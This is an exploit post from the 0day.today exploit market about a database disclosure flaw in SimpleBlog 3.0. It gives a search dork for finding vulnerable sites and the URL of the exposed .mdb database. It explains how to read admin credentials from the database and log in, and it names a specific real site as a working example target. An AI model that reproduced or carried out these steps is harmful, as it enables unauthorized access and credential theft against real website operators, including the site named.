[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SimpleBlog 3.0 (simpleBlog.mdb) Database Disclosure Vulnerability

Author
EL_MuHaMMeD
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4258
Category
web applications
Date add
25-11-2008
Platform
unsorted
=================================================================
SimpleBlog 3.0 (simpleBlog.mdb) Database Disclosure Vulnerability
=================================================================


[»] SimpleBlog 3.0 Mdb Vulnerability
[»]
[»] ----------------------------------------------------------
[»] Author : EL_MuHaMMeD
[»]
[»] Date : 26.11.2008
[»]
[»] -----------------------------------------------------------


Script : SimpleBlog 3.0

Download : http://www.8pixel.net/FetchFile.aspx?doc=simpleblog3.rar

Dork : "inurl:simpleblog3"

Our mdb path : db/simpleBlog.mdb

Exploits :

Step 1 - http://www.[target].com/[path]/simpleblog3/db/simpleBlog.mdb

Step 2 - Download that mdb file and read admin name & pass from "users" table.

Step 3 - http://www.[target].com/[path]/simpleblog3/admin/default.asp

Example :

http://www.bvrg.org.uk/simpleblog3/db/simpleBlog.mdb

http://www.bvrg.org.uk/simpleblog3/admin/default.asp

 

[»] ----------------------------------------------------------------------



#  0day.today [2024-11-15]  #